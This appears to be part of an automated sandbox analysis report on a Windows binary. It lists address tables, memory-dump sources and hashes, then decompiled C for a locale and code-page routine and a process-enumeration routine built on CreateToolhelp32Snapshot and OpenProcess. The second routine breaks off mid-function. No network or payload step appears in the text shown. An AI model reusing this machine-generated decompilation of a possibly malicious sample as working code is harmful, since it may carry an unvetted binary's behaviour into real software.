                                                                                                0x00fb0368
                                                                                                0x00fb0369
                                                                                                0x00fb036a
                                                                                                0x00fb036f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fafe3e
                                                                                                0x00fafe44
                                                                                                0x00fafe44
                                                                                                0x00fafe4a
                                                                                                0x00fafe4a
                                                                                                0x00fafe56
                                                                                                0x00000000
                                                                                                0x00fafe56
                                                                                                0x00fafaee
                                                                                                0x00fb0372
                                                                                                0x00fb0372
                                                                                                0x00fb0378
                                                                                                0x00fb037a
                                                                                                0x00fb0380
                                                                                                0x00fb0386
                                                                                                0x00fb0388
                                                                                                0x00fb038c
                                                                                                0x00fb038e
                                                                                                0x00fb038e
                                                                                                0x00fb0390
                                                                                                0x00fb0391
                                                                                                0x00fb0391
                                                                                                0x00fb0398
                                                                                                0x00fb039c
                                                                                                0x00fb03a3
                                                                                                0x00fb03a6
                                                                                                0x00fb03a7
                                                                                                0x00fb03a9
                                                                                                0x00fb03a9
                                                                                                0x00fb03ad
                                                                                                0x00fb03b3
                                                                                                0x00fb03b5
                                                                                                0x00fb03c0
                                                                                                0x00fb03c2
                                                                                                0x00fb03c8
                                                                                                0x00fb03cb
                                                                                                0x00fb03de
                                                                                                0x00fb03e1
                                                                                                0x00fb03e7
                                                                                                0x00fb03fc
                                                                                                0x00fb0401
                                                                                                0x00fb03cd
                                                                                                0x00fb03cf
                                                                                                0x00fb03d6
                                                                                                0x00fb03d6
                                                                                                0x00fb03cb
                                                                                                0x00fb0404
                                                                                                0x00fb0404
                                                                                                0x00fb0414
                                                                                                0x00fb041b
                                                                                                0x00fb041e
                                                                                                0x00fb04ba
                                                                                                0x00fb04bc
                                                                                                0x00fb04c7
                                                                                                0x00fb04c7
                                                                                                0x00fb04c9
                                                                                                0x00fb04cc
                                                                                                0x00000000
                                                                                                0x00fb04be
                                                                                                0x00fb04c4
                                                                                                0x00fb04c4
                                                                                                0x00fb0424
                                                                                                0x00fb0424
                                                                                                0x00fb042a
                                                                                                0x00fb042d
                                                                                                0x00fb0433
                                                                                                0x00fb0436
                                                                                                0x00fb043c
                                                                                                0x00fb043e
                                                                                                0x00fb0446
                                                                                                0x00fb0448
                                                                                                0x00fb044a
                                                                                                0x00fb044a
                                                                                                0x00fb044c
                                                                                                0x00fb044d
                                                                                                0x00fb044d
                                                                                                0x00fb0454
                                                                                                0x00fb0458
                                                                                                0x00fb045f
                                                                                                0x00fb0462
                                                                                                0x00fb0463
                                                                                                0x00fb0465
                                                                                                0x00fb0465
                                                                                                0x00fb0469
                                                                                                0x00fb0474
                                                                                                0x00fb0476
                                                                                                0x00fb0478
                                                                                                0x00fb047e
                                                                                                0x00fb0481
                                                                                                0x00fb0495
                                                                                                0x00fb049b
                                                                                                0x00fb04b0
                                                                                                0x00fb04b5
                                                                                                0x00fb0483
                                                                                                0x00fb0483
                                                                                                0x00fb048a
                                                                                                0x00fb048a
                                                                                                0x00fb0481
                                                                                                0x00fb0476
                                                                                                0x00fb04ce
                                                                                                0x00fb04ce
                                                                                                0x00fb04ce
                                                                                                0x00fb04da
                                                                                                0x00fb04dd
                                                                                                0x00fb04e3
                                                                                                0x00fb04e5
                                                                                                0x00fb04e7
                                                                                                0x00fb04ed
                                                                                                0x00fb04ef
                                                                                                0x00fb04ef
                                                                                                0x00fb04ef
                                                                                                0x00fb04ed
                                                                                                0x00fb04f4
                                                                                                0x00fb04f5
                                                                                                0x00fb04f7
                                                                                                0x00fb04f9
                                                                                                0x00fb04f9
                                                                                                0x00fb04fb
                                                                                                0x00fb0501
                                                                                                0x00fb0507
                                                                                                0x00fb0509
                                                                                                0x00fb050f
                                                                                                0x00fb050f
                                                                                                0x00fb0515
                                                                                                0x00fb0517
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fb051d
                                                                                                0x00fb051f
                                                                                                0x00fb0521
                                                                                                0x00fb0521
                                                                                                0x00fb0523
                                                                                                0x00fb0523
                                                                                                0x00fb0533
                                                                                                0x00fb053a
                                                                                                0x00fb053d
                                                                                                0x00fb053e
                                                                                                0x00fb0540
                                                                                                0x00fb0540
                                                                                                0x00fb0549
                                                                                                0x00fb054b
                                                                                                0x00fb054d
                                                                                                0x00fb0553
                                                                                                0x00fb0556
                                                                                                0x00fb0567
                                                                                                0x00fb056a
                                                                                                0x00fb0570
                                                                                                0x00fb0585
                                                                                                0x00fb058a
                                                                                                0x00fb0558
                                                                                                0x00fb0558
                                                                                                0x00fb055f
                                                                                                0x00fb055f
                                                                                                0x00fb0556
                                                                                                0x00fb059b
                                                                                                0x00fb05aa
                                                                                                0x00fb05ab
                                                                                                0x00fb05ab
                                                                                                0x00fb05ad
                                                                                                0x00fb05af
                                                                                                0x00fb05af
                                                                                                0x00fb05b5
                                                                                                0x00fb05b8
                                                                                                0x00fb05ba
                                                                                                0x00fb05bc
                                                                                                0x00fb05bc
                                                                                                0x00fb05bf
                                                                                                0x00fb05c0
                                                                                                0x00fb05c0
                                                                                                0x00fb05c5
                                                                                                0x00fb05c8
                                                                                                0x00fb05cc
                                                                                                0x00fb05cc
                                                                                                0x00fb05cd
                                                                                                0x00fb05cf
                                                                                                0x00fb05d5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fb05d5
                                                                                                0x00fb050f
                                                                                                0x00fb05db
                                                                                                0x00fb05db
                                                                                                0x00000000
                                                                                                0x00fb05db
                                                                                                0x00faf3e1
                                                                                                0x00faf3d8
                                                                                                0x00faf3cf
                                                                                                0x00faf382
                                                                                                0x00faf386
                                                                                                0x00faf38e
                                                                                                0x00000000
                                                                                                0x00faf390
                                                                                                0x00faf396
                                                                                                0x00faf39b
                                                                                                0x00faf39e
                                                                                                0x00faf3a2
                                                                                                0x00fb0622
                                                                                                0x00fb062c
                                                                                                0x00fb0639
                                                                                                0x00fb063a
                                                                                                0x00fb063b
                                                                                                0x00fb063c
                                                                                                0x00fb063d
                                                                                                0x00fb063e
                                                                                                0x00fb0643
                                                                                                0x00fb0644
                                                                                                0x00fb064b
                                                                                                0x00fb0650
                                                                                                0x00fb0656
                                                                                                0x00fb065b
                                                                                                0x00fb065c
                                                                                                0x00fb065c
                                                                                                0x00fb065c
                                                                                                0x00fb0662
                                                                                                0x00fb0663
                                                                                                0x00fb0663
                                                                                                0x00fb0666
                                                                                                0x00fb066c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fb066e
                                                                                                0x00fb0673
                                                                                                0x00fb0676
                                                                                                0x00fb0678
                                                                                                0x00fb067e
                                                                                                0x00fb0681
                                                                                                0x00fb0683
                                                                                                0x00fb0685
                                                                                                0x00fb068a
                                                                                                0x00fb068d
                                                                                                0x00fb0693
                                                                                                0x00fb0696
                                                                                                0x00fb0698
                                                                                                0x00fb0698
                                                                                                0x00fb0698
                                                                                                0x00fb0698
                                                                                                0x00fb0696
                                                                                                0x00fb069b
                                                                                                0x00fb06a7
                                                                                                0x00fb06ad
                                                                                                0x00fb06b5
                                                                                                0x00fb06ba
                                                                                                0x00fb06bb
                                                                                                0x00fb06c0
                                                                                                0x00fb06c0
                                                                                                0x00fb06c0
                                                                                                0x00fb06c0
                                                                                                0x00fb06c4
                                                                                                0x00fb06c4
                                                                                                0x00fb06c7
                                                                                                0x00fb06ce
                                                                                                0x00fb06db
                                                                                                0x00fb062e
                                                                                                0x00fb05de
                                                                                                0x00fb05de
                                                                                                0x00fb05e8
                                                                                                0x00fb05f1
                                                                                                0x00fb05f6
                                                                                                0x00fb0604
                                                                                                0x00fb0604
                                                                                                0x00fb062c
                                                                                                0x00faf38e

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: __floor_pentium4
                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                • API String ID: 4168288129-2761157908
                                                                                                • Opcode ID: fc277d4f5c4647c99e02d63cb8eafc69b72bc21c4f75839005b8bc5e7983e8f5
                                                                                                • Instruction ID: 1a16437bc30f4a0b6aff7626d4ba183e9276023a7a4877e7e1232c44b8c18ced
                                                                                                • Opcode Fuzzy Hash: fc277d4f5c4647c99e02d63cb8eafc69b72bc21c4f75839005b8bc5e7983e8f5
                                                                                                • Instruction Fuzzy Hash: C4C250B1E042288FDB64CF69DD407EAB3B5EB49314F1441EAD44DE7241E778AE859F40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 70%
                                                                                                			E00FAC58E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
                                                                                                				intOrPtr* _v8;
                                                                                                				short _v12;
                                                                                                				signed int _v32;
                                                                                                				intOrPtr _v40;
                                                                                                				signed int _v52;
                                                                                                				char _v272;
                                                                                                				short _v292;
                                                                                                				void* __ebp;
                                                                                                				void* _t33;
                                                                                                				short* _t34;
                                                                                                				intOrPtr* _t35;
                                                                                                				void* _t37;
                                                                                                				intOrPtr* _t38;
                                                                                                				signed short _t39;
                                                                                                				signed short* _t42;
                                                                                                				intOrPtr _t45;
                                                                                                				void* _t47;
                                                                                                				signed int _t50;
                                                                                                				void* _t52;
                                                                                                				signed int _t56;
                                                                                                				void* _t69;
                                                                                                				void* _t73;
                                                                                                				void* _t74;
                                                                                                				void* _t78;
                                                                                                				intOrPtr* _t85;
                                                                                                				short* _t87;
                                                                                                				intOrPtr* _t92;
                                                                                                				intOrPtr* _t96;
                                                                                                				short _t114;
                                                                                                				void* _t115;
                                                                                                				intOrPtr* _t117;
                                                                                                				intOrPtr _t120;
                                                                                                				signed int* _t121;
                                                                                                				intOrPtr* _t124;
                                                                                                				signed short _t126;
                                                                                                				int _t128;
                                                                                                				void* _t132;
                                                                                                				signed int _t133;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_push(__ecx);
                                                                                                				_push(__ebx);
                                                                                                				_t85 = _a4;
                                                                                                				_push(__esi);
                                                                                                				_push(__edi);
                                                                                                				_t33 = E00FA5DF2(__ecx, __edx);
                                                                                                				_t114 = 0;
                                                                                                				_v12 = 0;
                                                                                                				_t3 = _t33 + 0x50; // 0x50
                                                                                                				_t124 = _t3;
                                                                                                				_t4 = _t124 + 0x250; // 0x2a0
                                                                                                				_t34 = _t4;
                                                                                                				 *((intOrPtr*)(_t124 + 8)) = 0;
                                                                                                				 *_t34 = 0;
                                                                                                				_t6 = _t124 + 4; // 0x54
                                                                                                				_t117 = _t6;
                                                                                                				_v8 = _t34;
                                                                                                				_t92 = _t85;
                                                                                                				_t35 = _t85 + 0x80;
                                                                                                				 *_t124 = _t85;
                                                                                                				 *_t117 = _t35;
                                                                                                				if( *_t35 != 0) {
                                                                                                					E00FAC51F(0xfbe140, 0x16, _t117);
                                                                                                					_t92 =  *_t124;
                                                                                                					_t132 = _t132 + 0xc;
                                                                                                					_t114 = 0;
                                                                                                				}
                                                                                                				_push(_t124);
                                                                                                				if( *_t92 == _t114) {
                                                                                                					E00FABE84(_t92);
                                                                                                					goto L12;
                                                                                                				} else {
                                                                                                					if( *((intOrPtr*)( *_t117)) == _t114) {
                                                                                                						E00FABFA8();
                                                                                                					} else {
                                                                                                						E00FABF0D(_t92);
                                                                                                					}
                                                                                                					if( *((intOrPtr*)(_t124 + 8)) == 0) {
                                                                                                						_t78 = E00FAC51F(0xfbde30, 0x40, _t124);
                                                                                                						_t132 = _t132 + 0xc;
                                                                                                						if(_t78 != 0) {
                                                                                                							_push(_t124);
                                                                                                							if( *((intOrPtr*)( *_t117)) == 0) {
                                                                                                								E00FABFA8();
                                                                                                							} else {
                                                                                                								E00FABF0D(0);
                                                                                                							}
                                                                                                							L12:
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				if( *((intOrPtr*)(_t124 + 8)) == 0) {
                                                                                                					L37:
                                                                                                					_t37 = 0;
                                                                                                					goto L38;
                                                                                                				} else {
                                                                                                					_t38 = _t85 + 0x100;
                                                                                                					if( *_t85 != 0 ||  *_t38 != 0) {
                                                                                                						_t39 = E00FAC3D8(_t85, _t38, _t124);
                                                                                                					} else {
                                                                                                						_t39 = GetACP();
                                                                                                					}
                                                                                                					_t126 = _t39;
                                                                                                					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
                                                                                                						goto L37;
                                                                                                					} else {
                                                                                                						_t42 = _a8;
                                                                                                						if(_t42 != 0) {
                                                                                                							 *_t42 = _t126;
                                                                                                						}
                                                                                                						_t120 = _a12;
                                                                                                						if(_t120 == 0) {
                                                                                                							L36:
                                                                                                							_t37 = 1;
                                                                                                							L38:
                                                                                                							return _t37;
                                                                                                						} else {
                                                                                                							_t96 = _v8;
                                                                                                							_t15 = _t120 + 0x120; // 0xfa3ba8
                                                                                                							_t87 = _t15;
                                                                                                							 *_t87 = 0;
                                                                                                							_t115 = _t96 + 2;
                                                                                                							do {
                                                                                                								_t45 =  *_t96;
                                                                                                								_t96 = _t96 + 2;
                                                                                                							} while (_t45 != _v12);
                                                                                                							_t98 = _t96 - _t115 >> 1;
                                                                                                							_push((_t96 - _t115 >> 1) + 1);
                                                                                                							_t47 = E00FAAB6C(_t87, 0x55, _v8);
                                                                                                							_t133 = _t132 + 0x10;
                                                                                                							if(_t47 != 0) {
                                                                                                								L39:
                                                                                                								_push(0);
                                                                                                								_push(0);
                                                                                                								_push(0);
                                                                                                								_push(0);
                                                                                                								_push(0);
                                                                                                								E00F98DB9();
                                                                                                								asm("int3");
                                                                                                								_t131 = _t133;
                                                                                                								_t50 =  *0xfcf00c; // 0xfd8fa683
                                                                                                								_v52 = _t50 ^ _t133;
                                                                                                								_push(_t87);
                                                                                                								_push(_t126);
                                                                                                								_push(_t120);
                                                                                                								_t52 = E00FA5DF2(_t98, _t115);
                                                                                                								_t88 = _t52;
                                                                                                								_t121 =  *(E00FA5DF2(_t98, _t115) + 0x34c);
                                                                                                								_t128 = E00FACCD1(_v40);
                                                                                                								asm("sbb ecx, ecx");
                                                                                                								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                                                                                                								if(_t56 != 0) {
                                                                                                									if(E00F98E80(_t88, _t121, _t128,  *((intOrPtr*)(_t88 + 0x54)),  &_v272) == 0 && E00FACE05(_t128) != 0) {
                                                                                                										 *_t121 =  *_t121 | 0x00000004;
                                                                                                										_t121[2] = _t128;
                                                                                                										_t121[1] = _t128;
                                                                                                									}
                                                                                                								} else {
                                                                                                									 *_t121 =  *_t121 & _t56;
                                                                                                								}
                                                                                                								return E00F80D7F(_v32 ^ _t131, _t115);
                                                                                                							} else {
                                                                                                								if(E00FA7A9B(_t87, 0x1001, _t120, 0x40) == 0) {
                                                                                                									goto L37;
                                                                                                								} else {
                                                                                                									_t20 = _t120 + 0x80; // 0xfa3b08
                                                                                                									_t87 = _t20;
                                                                                                									_t21 = _t120 + 0x120; // 0xfa3ba8
                                                                                                									if(E00FA7A9B(_t21, 0x1002, _t87, 0x40) == 0) {
                                                                                                										goto L37;
                                                                                                									} else {
                                                                                                										_push(0x5f);
                                                                                                										_t69 = E00F9559B(_t98);
                                                                                                										_t98 = _t87;
                                                                                                										if(_t69 != 0) {
                                                                                                											L31:
                                                                                                											_t22 = _t120 + 0x120; // 0xfa3ba8
                                                                                                											if(E00FA7A9B(_t22, 7, _t87, 0x40) == 0) {
                                                                                                												goto L37;
                                                                                                											} else {
                                                                                                												goto L32;
                                                                                                											}
                                                                                                										} else {
                                                                                                											_push(0x2e);
                                                                                                											_t74 = E00F9559B(_t98);
                                                                                                											_t98 = _t87;
                                                                                                											if(_t74 == 0) {
                                                                                                												L32:
                                                                                                												_t120 = _t120 + 0x100;
                                                                                                												if(_t126 != 0xfde9) {
                                                                                                													E00F9C35F(_t98, _t126, _t120, 0x10, 0xa);
                                                                                                													goto L36;
                                                                                                												} else {
                                                                                                													_push(5);
                                                                                                													_t73 = E00FAAB6C(_t120, 0x10, L"utf8");
                                                                                                													_t133 = _t133 + 0x10;
                                                                                                													if(_t73 != 0) {
                                                                                                														goto L39;
                                                                                                													} else {
                                                                                                														goto L36;
                                                                                                													}
                                                                                                												}
                                                                                                											} else {
                                                                                                												goto L31;
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}









































                                                                                                0x00fac593
                                                                                                0x00fac594
                                                                                                0x00fac595
                                                                                                0x00fac596
                                                                                                0x00fac599
                                                                                                0x00fac59a
                                                                                                0x00fac59b
                                                                                                0x00fac5a2
                                                                                                0x00fac5a4
                                                                                                0x00fac5a7
                                                                                                0x00fac5a7
                                                                                                0x00fac5aa
                                                                                                0x00fac5aa
                                                                                                0x00fac5b0
                                                                                                0x00fac5b3
                                                                                                0x00fac5b6
                                                                                                0x00fac5b6
                                                                                                0x00fac5b9
                                                                                                0x00fac5bc
                                                                                                0x00fac5be
                                                                                                0x00fac5c4
                                                                                                0x00fac5c6
                                                                                                0x00fac5cb
                                                                                                0x00fac5d5
                                                                                                0x00fac5da
                                                                                                0x00fac5dc
                                                                                                0x00fac5df
                                                                                                0x00fac5df
                                                                                                0x00fac5e1
                                                                                                0x00fac5e5
                                                                                                0x00fac62e
                                                                                                0x00000000
                                                                                                0x00fac5e7
                                                                                                0x00fac5ec
                                                                                                0x00fac5f5
                                                                                                0x00fac5ee
                                                                                                0x00fac5ee
                                                                                                0x00fac5ee
                                                                                                0x00fac600
                                                                                                0x00fac60a
                                                                                                0x00fac60f
                                                                                                0x00fac614
                                                                                                0x00fac61a
                                                                                                0x00fac61e
                                                                                                0x00fac627
                                                                                                0x00fac620
                                                                                                0x00fac620
                                                                                                0x00fac620
                                                                                                0x00fac633
                                                                                                0x00fac633
                                                                                                0x00fac614
                                                                                                0x00fac600
                                                                                                0x00fac639
                                                                                                0x00fac775
                                                                                                0x00fac775
                                                                                                0x00000000
                                                                                                0x00fac63f
                                                                                                0x00fac63f
                                                                                                0x00fac648
                                                                                                0x00fac659
                                                                                                0x00fac64f
                                                                                                0x00fac64f
                                                                                                0x00fac64f
                                                                                                0x00fac660
                                                                                                0x00fac664
                                                                                                0x00000000
                                                                                                0x00fac688
                                                                                                0x00fac688
                                                                                                0x00fac68d
                                                                                                0x00fac68f
                                                                                                0x00fac68f
                                                                                                0x00fac691
                                                                                                0x00fac696
                                                                                                0x00fac770
                                                                                                0x00fac772
                                                                                                0x00fac777
                                                                                                0x00fac77d
                                                                                                0x00fac69c
                                                                                                0x00fac69c
                                                                                                0x00fac69f
                                                                                                0x00fac69f
                                                                                                0x00fac6a7
                                                                                                0x00fac6aa
                                                                                                0x00fac6ad
                                                                                                0x00fac6ad
                                                                                                0x00fac6b0
                                                                                                0x00fac6b3
                                                                                                0x00fac6bb
                                                                                                0x00fac6c0
                                                                                                0x00fac6c7
                                                                                                0x00fac6cc
                                                                                                0x00fac6d1
                                                                                                0x00fac77e
                                                                                                0x00fac780
                                                                                                0x00fac781
                                                                                                0x00fac782
                                                                                                0x00fac783
                                                                                                0x00fac784
                                                                                                0x00fac785
                                                                                                0x00fac78a
                                                                                                0x00fac78e
                                                                                                0x00fac796
                                                                                                0x00fac79d
                                                                                                0x00fac7a0
                                                                                                0x00fac7a1
                                                                                                0x00fac7a5
                                                                                                0x00fac7a6
                                                                                                0x00fac7ab
                                                                                                0x00fac7b3
                                                                                                0x00fac7c2
                                                                                                0x00fac7ce
                                                                                                0x00fac7df
                                                                                                0x00fac7e7
                                                                                                0x00fac801
                                                                                                0x00fac80e
                                                                                                0x00fac811
                                                                                                0x00fac814
                                                                                                0x00fac814
                                                                                                0x00fac7e9
                                                                                                0x00fac7e9
                                                                                                0x00fac7eb
                                                                                                0x00fac831
                                                                                                0x00fac6d7
                                                                                                0x00fac6e7
                                                                                                0x00000000
                                                                                                0x00fac6ed
                                                                                                0x00fac6ef
                                                                                                0x00fac6ef
                                                                                                0x00fac6fb
                                                                                                0x00fac709
                                                                                                0x00000000
                                                                                                0x00fac70b
                                                                                                0x00fac70b
                                                                                                0x00fac70e
                                                                                                0x00fac714
                                                                                                0x00fac717
                                                                                                0x00fac727
                                                                                                0x00fac72c
                                                                                                0x00fac73a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fac719
                                                                                                0x00fac719
                                                                                                0x00fac71c
                                                                                                0x00fac722
                                                                                                0x00fac725
                                                                                                0x00fac73c
                                                                                                0x00fac73c
                                                                                                0x00fac748
                                                                                                0x00fac768
                                                                                                0x00000000
                                                                                                0x00fac74a
                                                                                                0x00fac74a
                                                                                                0x00fac754
                                                                                                0x00fac759
                                                                                                0x00fac75e
                                                                                                0x00000000
                                                                                                0x00fac760
                                                                                                0x00000000
                                                                                                0x00fac760
                                                                                                0x00fac75e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fac725
                                                                                                0x00fac717
                                                                                                0x00fac709
                                                                                                0x00fac6e7
                                                                                                0x00fac6d1
                                                                                                0x00fac696
                                                                                                0x00fac664

                                                                                                APIs
                                                                                                  • Part of subcall function 00FA5DF2: GetLastError.KERNEL32(?,?,00000008,00FAA789,00F85649,00F8568F), ref: 00FA5DF7
                                                                                                  • Part of subcall function 00FA5DF2: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FA5E95
                                                                                                • GetACP.KERNEL32(00000055,?,?,?,?,?,00FA3A88,?,?,?,?,?,?,00000004), ref: 00FAC64F
                                                                                                • IsValidCodePage.KERNEL32(00000000,00000055,?,?,?,?,?,00FA3A88,?,?,?,?,?,?,00000004), ref: 00FAC67A
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00FAC70E
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00FAC71C
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00FA3A88,00000000,00FA3BA8), ref: 00FAC7DF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                • String ID: utf8
                                                                                                • API String ID: 4147378913-905460609
                                                                                                • Opcode ID: 9dd7dfd93eea56ebd7f3e8a22a99871a1cf0f5273a566b562fa52c6102b86fdd
                                                                                                • Instruction ID: 1bf6888c725ce96a7468173872f3b62519ff841d27adec738df08dbd6fd8c31a
                                                                                                • Opcode Fuzzy Hash: 9dd7dfd93eea56ebd7f3e8a22a99871a1cf0f5273a566b562fa52c6102b86fdd
                                                                                                • Instruction Fuzzy Hash: C8711BB1A00305AAEB25AB75CC46BB673A8EF47750F144429F905D7181FB74ED41BBE0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E00F737A0(void* __ebx, intOrPtr* __ecx, void* __edi, char _a4, long _a8, char _a24, char _a36, signed int _a556, void* _a560, void* _a568, int _a604) {
                                                                                                				int _v4;
                                                                                                				signed int _v12;
                                                                                                				int _v16;
                                                                                                				int _v20;
                                                                                                				int _v24;
                                                                                                				void* _v28;
                                                                                                				int _v32;
                                                                                                				char _v36;
                                                                                                				int _v40;
                                                                                                				intOrPtr _v44;
                                                                                                				int _v48;
                                                                                                				intOrPtr _v52;
                                                                                                				char _v56;
                                                                                                				intOrPtr* _v60;
                                                                                                				int _v64;
                                                                                                				int _v68;
                                                                                                				char _v84;
                                                                                                				intOrPtr* _v88;
                                                                                                				char _v112;
                                                                                                				char _v564;
                                                                                                				intOrPtr _v708;
                                                                                                				char _v716;
                                                                                                				signed int _v720;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t110;
                                                                                                				signed int _t111;
                                                                                                				void* _t113;
                                                                                                				struct tagPROCESSENTRY32W* _t116;
                                                                                                				void* _t118;
                                                                                                				void* _t124;
                                                                                                				intOrPtr* _t127;
                                                                                                				signed int _t136;
                                                                                                				signed int _t138;
                                                                                                				signed int _t143;
                                                                                                				int _t147;
                                                                                                				signed int _t161;
                                                                                                				signed int _t167;
                                                                                                				signed int _t169;
                                                                                                				signed int _t170;
                                                                                                				intOrPtr* _t176;
                                                                                                				void* _t180;
                                                                                                				int _t186;
                                                                                                				signed int _t188;
                                                                                                				long* _t190;
                                                                                                				signed int _t193;
                                                                                                				struct tagPROCESSENTRY32W _t195;
                                                                                                				void* _t197;
                                                                                                				void* _t199;
                                                                                                				signed int _t200;
                                                                                                
                                                                                                				_t195 =  &_v564;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb5882);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t199 = _t197 - 0x1cc;
                                                                                                				_t110 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t111 = _t110 ^ _t195;
                                                                                                				_a556 = _t111;
                                                                                                				_push(_t111);
                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                				_t158 = __ecx;
                                                                                                				_v60 = __ecx;
                                                                                                				_v36 = __ecx;
                                                                                                				_v88 = __ecx;
                                                                                                				_v32 = 0;
                                                                                                				_v4 = 1;
                                                                                                				_t186 = 0;
                                                                                                				_t190 = 0;
                                                                                                				_v24 = 0;
                                                                                                				_v20 = 0;
                                                                                                				_v16 = 0;
                                                                                                				_v4 = 2;
                                                                                                				_t113 = CreateToolhelp32Snapshot(2, 0);
                                                                                                				_v28 = _t113;
                                                                                                				_v52 = 0xfc6b50;
                                                                                                				_v48 = _t113;
                                                                                                				_v4 = 3;
                                                                                                				if(_t113 != 0xffffffff) {
                                                                                                					E00F95A00(0,  &_a4, 0, 0x228);
                                                                                                					_t200 = _t199 + 0xc;
                                                                                                					 *_t195 = 0x22c;
                                                                                                					_t116 = _t195;
                                                                                                					Process32FirstW(_v28, _t116);
                                                                                                					__eflags = _t116;
                                                                                                					if(_t116 == 0) {
                                                                                                						L19:
                                                                                                						 *_t158 = _t186;
                                                                                                						 *(_t158 + 4) = _t190;
                                                                                                						 *((intOrPtr*)(_t158 + 8)) = _v16;
                                                                                                						_v24 = 0;
                                                                                                						_v20 = 0;
                                                                                                						_v16 = 0;
                                                                                                						_v32 = 1;
                                                                                                						_v4 = 2;
                                                                                                						_t118 = _v28;
                                                                                                						_v52 = 0xfc6b50;
                                                                                                						__eflags = _t118;
                                                                                                						if(_t118 != 0) {
                                                                                                							CloseHandle(_t118);
                                                                                                							_v48 = 0;
                                                                                                						}
                                                                                                						_v4 = 0;
                                                                                                						_t161 = _a604;
                                                                                                						__eflags = _t161;
                                                                                                						if(_t161 != 0) {
                                                                                                							__eflags = _t161 -  &_a568;
                                                                                                							_t94 = _t161 !=  &_a568;
                                                                                                							__eflags = _t94;
                                                                                                							 *((intOrPtr*)( *_t161 + 0x10))(_t177);
                                                                                                							goto L23;
                                                                                                						}
                                                                                                						goto L24;
                                                                                                					} else {
                                                                                                						do {
                                                                                                							_t124 = OpenProcess(0x410, 0, _a8);
                                                                                                							_t188 = _t124;
                                                                                                							_v44 = 0xfc6b50;
                                                                                                							_v40 = _t188;
                                                                                                							_v4 = 5;
                                                                                                							__eflags = _t188 - 0xffffffff;
                                                                                                							if(__eflags != 0) {
                                                                                                								E00F73B50(_t158,  &_v112, _t188, _t188, _t190, __eflags);
                                                                                                								_v4 = 6;
                                                                                                								__eflags = 0;
                                                                                                								_v84 = 0;
                                                                                                								_t127 =  &_a36;
                                                                                                								_v68 = 0;
                                                                                                								_t180 = _t127 + 2;
                                                                                                								_v64 = 0;
                                                                                                								_v68 = 0;
                                                                                                								_v64 = 7;
                                                                                                								do {
                                                                                                									_t167 =  *_t127;
                                                                                                									_t127 = _t127 + 2;
                                                                                                									__eflags = _t167;
                                                                                                								} while (_t167 != 0);
                                                                                                								E00F71D10(_t158,  &_v84, _t188, _t190,  &_a36, _t127 - _t180 >> 1);
                                                                                                								_v4 = 7;
                                                                                                								_v56 = _a24;
                                                                                                								_v36 = _a8;
                                                                                                								_v4 = 9;
                                                                                                								_t169 = _a604;
                                                                                                								__eflags = _t169;
                                                                                                								if(__eflags == 0) {
                                                                                                									E00F81DA5(__eflags);
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									_push(_t195);
                                                                                                									_push(0xffffffff);
                                                                                                									_push(0xfb58b8);
                                                                                                									_push( *[fs:0x0]);
                                                                                                									_push(_t169);
                                                                                                									_push(_t190);
                                                                                                									_t136 =  *0xfcf00c; // 0xfd8fa683
                                                                                                									_push(_t136 ^ _t200);
                                                                                                									_t138 =  &_v716;
                                                                                                									 *[fs:0x0] = _t138;
